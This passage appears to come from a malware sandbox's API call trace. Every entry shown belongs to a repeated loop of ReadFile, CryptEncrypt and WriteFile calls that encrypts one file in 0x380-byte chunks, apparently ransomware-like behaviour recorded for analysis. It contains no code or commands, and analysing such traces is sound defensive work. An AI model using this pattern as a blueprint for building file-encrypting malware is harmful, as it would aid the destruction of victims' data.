lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.328] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.328] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.329] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.329] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.329] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.329] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.329] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.329] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.330] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.330] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.330] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.330] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.330] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.331] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.331] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.331] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.331] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.331] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.331] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.331] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.332] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.332] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.332] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.332] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.332] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.332] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.334] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.334] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.334] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.334] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.334] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.334] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.335] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.335] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.335] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.335] ReadFile (in: hFile=0x5d48, 